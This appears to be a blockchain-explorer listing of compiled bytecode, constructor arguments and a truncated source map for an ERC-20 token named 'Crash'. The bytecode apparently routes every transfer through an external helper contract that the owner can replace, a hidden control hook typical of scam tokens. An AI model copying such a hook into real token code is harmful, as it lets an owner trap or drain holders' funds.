40161107390611997565b60405180910390fd5b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611103576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110fa906118b7565b60405180910390fd5b818103600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816003600082825461115b9190611c8a565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111c09190611a17565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b61129a336113a5565b156112e15780600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b50565b600080600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663e1f21c678686866040518463ffffffff1660e01b815260040161134693929190611823565b602060405180830381600087803b15801561136057600080fd5b505af1158015611374573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611398919061159d565b9050809150509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16149050919050565b61025c806121a283390190565b60008135905061141a8161215c565b92915050565b60008151905061142f81612173565b92915050565b6000813590506114448161218a565b92915050565b60006020828403121561145c57600080fd5b600061146a8482850161140b565b91505092915050565b6000806040838503121561148657600080fd5b60006114948582860161140b565b92505060206114a58582860161140b565b9150509250929050565b6000806000606084860312156114c457600080fd5b60006114d28682870161140b565b93505060206114e38682870161140b565b92505060406114f486828701611435565b9150509250925092565b6000806000806080858703121561151457600080fd5b60006115228782880161140b565b94505060206115338782880161140b565b935050604061154487828801611435565b92505060606115558782880161140b565b91505092959194509250565b6000806040838503121561157457600080fd5b60006115828582860161140b565b925050602061159385828601611435565b9150509250929050565b6000602082840312156115af57600080fd5b60006115bd84828501611420565b91505092915050565b6000602082840312156115d857600080fd5b60006115e684828501611435565b91505092915050565b6115f881611cbe565b82525050565b61160781611cd0565b82525050565b600061161882611a4d565b6116228185611a58565b9350611632818560208601611d13565b61163b81611dd6565b840191505092915050565b6000611653602383611a58565b915061165e82611df4565b604082019050919050565b6000611676602283611a58565b915061168182611e43565b604082019050919050565b6000611699602683611a58565b91506116a482611e92565b604082019050919050565b60006116bc602283611a58565b91506116c782611ee1565b604082019050919050565b60006116df602683611a58565b91506116ea82611f30565b604082019050919050565b6000611702601b83611a58565b915061170d82611f7f565b602082019050919050565b6000611725602883611a58565b915061173082611fa8565b604082019050919050565b6000611748602083611a58565b915061175382611ff7565b602082019050919050565b600061176b602183611a58565b915061177682612020565b604082019050919050565b600061178e602583611a58565b91506117998261206f565b604082019050919050565b60006117b1602483611a58565b91506117bc826120be565b604082019050919050565b60006117d4602583611a58565b91506117df8261210d565b604082019050919050565b6117f381611cfc565b82525050565b61180281611d06565b82525050565b600060208201905061181d60008301846115ef565b92915050565b600060608201905061183860008301866115ef565b61184560208301856115ef565b61185260408301846117ea565b949350505050565b600060208201905061186f60008301846115fe565b92915050565b6000602082019050818103600083015261188f818461160d565b905092915050565b600060208201905081810360008301526118b081611646565b9050919050565b600060208201905081810360008301526118d081611669565b9050919050565b600060208201905081810360008301526118f08161168c565b9050919050565b60006020820190508181036000830152611910816116af565b9050919050565b60006020820190508181036000830152611930816116d2565b9050919050565b60006020820190508181036000830152611950816116f5565b9050919050565b6000602082019050818103600083015261197081611718565b9050919050565b600060208201905081810360008301526119908161173b565b9050919050565b600060208201905081810360008301526119b08161175e565b9050919050565b600060208201905081810360008301526119d081611781565b9050919050565b600060208201905081810360008301526119f0816117a4565b9050919050565b60006020820190508181036000830152611a10816117c7565b9050919050565b6000602082019050611a2c60008301846117ea565b92915050565b6000602082019050611a4760008301846117f9565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611a7482611cfc565b9150611a7f83611cfc565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611ab457611ab3611d78565b5b828201905092915050565b6000808291508390505b6001851115611b0957808604811115611ae557611ae4611d78565b5b6001851615611af45780820291505b8081029050611b0285611de7565b9450611ac9565b94509492505050565b6000611b1d82611cfc565b9150611b2883611d06565b9250611b557fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611b5d565b905092915050565b600082611b6d5760019050611c29565b81611b7b5760009050611c29565b8160018114611b915760028114611b9b57611bca565b6001915050611c29565b60ff841115611bad57611bac611d78565b5b8360020a915084821115611bc457611bc3611d78565b5b50611c29565b5060208310610133831016604e8410600b8410161715611bff5782820a905083811115611bfa57611bf9611d78565b5b611c29565b611c0c8484846001611abf565b92509050818404811115611c2357611c22611d78565b5b81810290505b9392505050565b6000611c3b82611cfc565b9150611c4683611cfc565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611c7f57611c7e611d78565b5b828202905092915050565b6000611c9582611cfc565b9150611ca083611cfc565b925082821015611cb357611cb2611d78565b5b828203905092915050565b6000611cc982611cdc565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611d31578082015181840152602081019050611d16565b83811115611d40576000848401525b50505050565b60006002820490506001821680611d5e57607f821691505b60208210811415611d7257611d71611da7565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b60008160011c9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b61216581611cbe565b811461217057600080fd5b50565b61217c81611cd0565b811461218757600080fd5b50565b61219381611cfc565b811461219e57600080fd5b5056fe608060405234801561001057600080fd5b5061023c806100206000396000f3fe608060405234801561001057600080fd5b506004361061002b5760003560e01c8063e1f21c6714610030575b600080fd5b61004a60048036038101906100459190610117565b610060565b6040516100579190610175565b60405180910390f35b6000816000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600190509392505050565b6000813590506100fc816101d8565b92915050565b600081359050610111816101ef565b92915050565b60008060006060848603121561012c57600080fd5b600061013a868287016100ed565b935050602061014b868287016100ed565b925050604061015c86828701610102565b9150509250925092565b61016f816101a2565b82525050565b600060208201905061018a6000830184610166565b92915050565b600061019b826101ae565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b6101e181610190565b81146101ec57600080fd5b50565b6101f8816101ce565b811461020357600080fd5b5056fea2646970667358221220a73db6eb34b59a2bfd5478268d46230367444aabeff3863075f7285b3cbd3fdd64736f6c63430008010033a2646970667358221220994d03b14e6d14491ca961c65a55d8ffa02fd079e1c62e17dc8e9a8daf9190d464736f6c63430008010033608060405234801561001057600080fd5b5061023c806100206000396000f3fe608060405234801561001057600080fd5b506004361061002b5760003560e01c8063e1f21c6714610030575b600080fd5b61004a60048036038101906100459190610117565b610060565b6040516100579190610175565b60405180910390f35b6000816000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600190509392505050565b6000813590506100fc816101d8565b92915050565b600081359050610111816101ef565b92915050565b60008060006060848603121561012c57600080fd5b600061013a868287016100ed565b935050602061014b868287016100ed565b925050604061015c86828701610102565b9150509250925092565b61016f816101a2565b82525050565b600060208201905061018a6000830184610166565b92915050565b600061019b826101ae565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b6101e181610190565b81146101ec57600080fd5b50565b6101f8816101ce565b811461020357600080fd5b5056fea2646970667358221220a73db6eb34b59a2bfd5478268d46230367444aabeff3863075f7285b3cbd3fdd64736f6c63430008010033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000d692230906442a1be5b646f0a7e424ced09a8be00000000000000000000000000000000000000000000000000000000000000005437261736800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000054352415348000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610323578063bbb9697614610353578063dd62ed3e1461036f578063f2fde38b1461039f578063fb86a404146103bb5761012c565b8063715018a6146102a357806375150e01146102ad5780638da5cb5b146102b757806395d89b41146102d5578063a457c2d7146102f35761012c565b8063313ce567116100f4578063313ce567146101eb578063395093511461020957806342966c68146102395780636ddd17131461025557806370a08231146102735761012c565b80630525be511461013157806306fdde031461014f578063095ea7b31461016d57806318160ddd1461019d57806323b872dd146101bb575b600080fd5b6101396103d9565b6040516101469190611808565b60405180910390f35b61015761040b565b6040516101649190611875565b60405180910390f35b61018760048036038101906101829190611561565b61049d565b604051610194919061185a565b60405180910390f35b6101a56104bb565b6040516101b29190611a17565b60405180910390f35b6101d560048036038101906101d091906114af565b6104c5565b6040516101e2919061185a565b60405180910390f35b6101f36105bd565b6040516102009190611a32565b60405180910390f35b610223600480360381019061021e9190611561565b6105c6565b604051610230919061185a565b60405180910390f35b610253600480360381019061024e91906115c6565b610672565b005b61025d610686565b60405161026a919061185a565b60405180910390f35b61028d6004803603810190610288919061144a565b610699565b60405161029a9190611a17565b60405180910390f35b6102ab6106e2565b005b6102b56106f6565b005b6102bf61072a565b6040516102cc9190611808565b60405180910390f35b6102dd610753565b6040516102ea9190611875565b60405180910390f35b61030d60048036038101906103089190611561565b6107e5565b60405161031a919061185a565b60405180910390f35b61033d60048036038101906103389190611561565b6108d0565b60405161034a919061185a565b60405180910390f35b61036d600480360381019061036891906114fe565b6108ee565b005b61038960048036038101906103849190611473565b6109d2565b6040516103969190611a17565b60405180910390f35b6103b960048036038101906103b4919061144a565b610a59565b005b6103c3610add565b6040516103d09190611a17565b60405180910390f35b60006103e3610afe565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461041a90611d46565b80601f016020809104026020016040519081016040528092919081815260200182805461044690611d46565b80156104935780601f1061046857610100808354040283529160200191610493565b820191906000526020600020905b81548152906001019060200180831161047657829003601f168201915b5050505050905090565b60006104b16104aa610b7c565b8484610b84565b6001905092915050565b6000600354905090565b60006104d2848484610d4f565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061051d610b7c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561059d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161059490611957565b60405180910390fd5b6105b1856105a9610b7c565b858403610b84565b60019150509392505050565b60006009905090565b60006106686105d3610b7c565b8484600260006105e1610b7c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106639190611a69565b610b84565b6001905092915050565b61068361067d610b7c565b8261100c565b50565b600760009054906101000a900460ff1681565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6106ea610afe565b6106f460006111cd565b565b6106fe610afe565b600760009054906101000a900460ff1615600760006101000a81548160ff021916908315150217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461076290611d46565b80601f016020809104026020016040519081016040528092919081815260200182805461078e90611d46565b80156107db5780601f106107b0576101008083540402835291602001916107db565b820191906000526020600020905b8154815290600101906020018083116107be57829003601f168201915b5050505050905090565b600080600260006107f4610b7c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156108b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108a8906119f7565b60405180910390fd5b6108c56108bc610b7c565b85858403610b84565b600191505092915050565b60006108e46108dd610b7c565b8484610d4f565b6001905092915050565b6108f6610afe565b60011515600760009054906101000a900460ff16151514156109cc5760008211801561094e57508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b156109615761095c81611291565b6109cb565b60405161096d906113fe565b604051809103906000f080158015610989573d6000803e3d6000fd5b50600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b5b50505050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a61610afe565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610ad1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ac8906118d7565b60405180910390fd5b610ada816111cd565b50565b6009600a610aeb9190611b12565b64e8d4a51000610afb9190611c30565b81565b610b06610b7c565b73ffffffffffffffffffffffffffffffffffffffff16610b2461072a565b73ffffffffffffffffffffffffffffffffffffffff1614610b7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7190611977565b60405180910390fd5b565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610bf4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610beb906119d7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5b906118f7565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610d429190611a17565b60405180910390a3505050565b60008111610d92576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d8990611937565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610e02576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df9906119b7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6990611897565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ef9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef090611917565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f8e9190611a69565b92505081905550610fa08484846112e4565b508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ffe9190611a17565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561107c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107390611997565b60405180910390fd5b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611103576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110fa906118b7565b60405180910390fd5b818103600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816003600082825461115b9190611c8a565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111c09190611a17565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b61129a336113a5565b156112e15780600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b50565b600080600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663e1f21c678686866040518463ffffffff1660e01b815260040161134693929190611823565b602060405180830381600087803b15801561136057600080fd5b505af1158015611374573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611398919061159d565b9050809150509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16149050919050565b61025c806121a283390190565b60008135905061141a8161215c565b92915050565b60008151905061142f81612173565b92915050565b6000813590506114448161218a565b92915050565b60006020828403121561145c57600080fd5b600061146a8482850161140b565b91505092915050565b6000806040838503121561148657600080fd5b60006114948582860161140b565b92505060206114a58582860161140b565b9150509250929050565b6000806000606084860312156114c457600080fd5b60006114d28682870161140b565b93505060206114e38682870161140b565b92505060406114f486828701611435565b9150509250925092565b6000806000806080858703121561151457600080fd5b60006115228782880161140b565b94505060206115338782880161140b565b935050604061154487828801611435565b92505060606115558782880161140b565b91505092959194509250565b6000806040838503121561157457600080fd5b60006115828582860161140b565b925050602061159385828601611435565b9150509250929050565b6000602082840312156115af57600080fd5b60006115bd84828501611420565b91505092915050565b6000602082840312156115d857600080fd5b60006115e684828501611435565b91505092915050565b6115f881611cbe565b82525050565b61160781611cd0565b82525050565b600061161882611a4d565b6116228185611a58565b9350611632818560208601611d13565b61163b81611dd6565b840191505092915050565b6000611653602383611a58565b915061165e82611df4565b604082019050919050565b6000611676602283611a58565b915061168182611e43565b604082019050919050565b6000611699602683611a58565b91506116a482611e92565b604082019050919050565b60006116bc602283611a58565b91506116c782611ee1565b604082019050919050565b60006116df602683611a58565b91506116ea82611f30565b604082019050919050565b6000611702601b83611a58565b915061170d82611f7f565b602082019050919050565b6000611725602883611a58565b915061173082611fa8565b604082019050919050565b6000611748602083611a58565b915061175382611ff7565b602082019050919050565b600061176b602183611a58565b915061177682612020565b604082019050919050565b600061178e602583611a58565b91506117998261206f565b604082019050919050565b60006117b1602483611a58565b91506117bc826120be565b604082019050919050565b60006117d4602583611a58565b91506117df8261210d565b604082019050919050565b6117f381611cfc565b82525050565b61180281611d06565b82525050565b600060208201905061181d60008301846115ef565b92915050565b600060608201905061183860008301866115ef565b61184560208301856115ef565b61185260408301846117ea565b949350505050565b600060208201905061186f60008301846115fe565b92915050565b6000602082019050818103600083015261188f818461160d565b905092915050565b600060208201905081810360008301526118b081611646565b9050919050565b600060208201905081810360008301526118d081611669565b9050919050565b600060208201905081810360008301526118f08161168c565b9050919050565b60006020820190508181036000830152611910816116af565b9050919050565b60006020820190508181036000830152611930816116d2565b9050919050565b60006020820190508181036000830152611950816116f5565b9050919050565b6000602082019050818103600083015261197081611718565b9050919050565b600060208201905081810360008301526119908161173b565b9050919050565b600060208201905081810360008301526119b08161175e565b9050919050565b600060208201905081810360008301526119d081611781565b9050919050565b600060208201905081810360008301526119f0816117a4565b9050919050565b60006020820190508181036000830152611a10816117c7565b9050919050565b6000602082019050611a2c60008301846117ea565b92915050565b6000602082019050611a4760008301846117f9565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611a7482611cfc565b9150611a7f83611cfc565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611ab457611ab3611d78565b5b828201905092915050565b6000808291508390505b6001851115611b0957808604811115611ae557611ae4611d78565b5b6001851615611af45780820291505b8081029050611b0285611de7565b9450611ac9565b94509492505050565b6000611b1d82611cfc565b9150611b2883611d06565b9250611b557fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611b5d565b905092915050565b600082611b6d5760019050611c29565b81611b7b5760009050611c29565b8160018114611b915760028114611b9b57611bca565b6001915050611c29565b60ff841115611bad57611bac611d78565b5b8360020a915084821115611bc457611bc3611d78565b5b50611c29565b5060208310610133831016604e8410600b8410161715611bff5782820a905083811115611bfa57611bf9611d78565b5b611c29565b611c0c8484846001611abf565b92509050818404811115611c2357611c22611d78565b5b81810290505b9392505050565b6000611c3b82611cfc565b9150611c4683611cfc565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611c7f57611c7e611d78565b5b828202905092915050565b6000611c9582611cfc565b9150611ca083611cfc565b925082821015611cb357611cb2611d78565b5b828203905092915050565b6000611cc982611cdc565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611d31578082015181840152602081019050611d16565b83811115611d40576000848401525b50505050565b60006002820490506001821680611d5e57607f821691505b60208210811415611d7257611d71611da7565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b60008160011c9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b61216581611cbe565b811461217057600080fd5b50565b61217c81611cd0565b811461218757600080fd5b50565b61219381611cfc565b811461219e57600080fd5b5056fe608060405234801561001057600080fd5b5061023c806100206000396000f3fe608060405234801561001057600080fd5b506004361061002b5760003560e01c8063e1f21c6714610030575b600080fd5b61004a60048036038101906100459190610117565b610060565b6040516100579190610175565b60405180910390f35b6000816000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600190509392505050565b6000813590506100fc816101d8565b92915050565b600081359050610111816101ef565b92915050565b60008060006060848603121561012c57600080fd5b600061013a868287016100ed565b935050602061014b868287016100ed565b925050604061015c86828701610102565b9150509250925092565b61016f816101a2565b82525050565b600060208201905061018a6000830184610166565b92915050565b600061019b826101ae565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b6101e181610190565b81146101ec57600080fd5b50565b6101f8816101ce565b811461020357600080fd5b5056fea2646970667358221220a73db6eb34b59a2bfd5478268d46230367444aabeff3863075f7285b3cbd3fdd64736f6c63430008010033a2646970667358221220994d03b14e6d14491ca961c65a55d8ffa02fd079e1c62e17dc8e9a8daf9190d464736f6c63430008010033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000d692230906442a1be5b646f0a7e424ced09a8be00000000000000000000000000000000000000000000000000000000000000005437261736800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000054352415348000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Crash
Arg [1] : symbol_ (string): CRASH
Arg [2] : _to (address): 0xd692230906442a1bE5b646F0A7E424CeD09a8be0

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000d692230906442a1be5b646f0a7e424ced09a8be0
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [4] : 4372617368000000000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [6] : 4352415348000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

8681:10331:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9562:103;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9772:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12471:184;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10741:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12995:529;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10529:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13871:225;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17894:85;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9119:23;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11039:143;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7375:103;;;:::i;:::-;;18928:81;;;:::i;:::-;;6734:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10291:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14428:460;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11476:200;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16222:313;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11978:164;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7633:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9029:71;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9562:103;9615:7;6620:13;:11;:13::i;:::-;9649:7:::1;;;;;;;;;;;9634:23;;9562:103:::0;:::o;9772:100::-;9826:13;9859:5;9852:12;;;;;:::i;:::-;;;;;;;;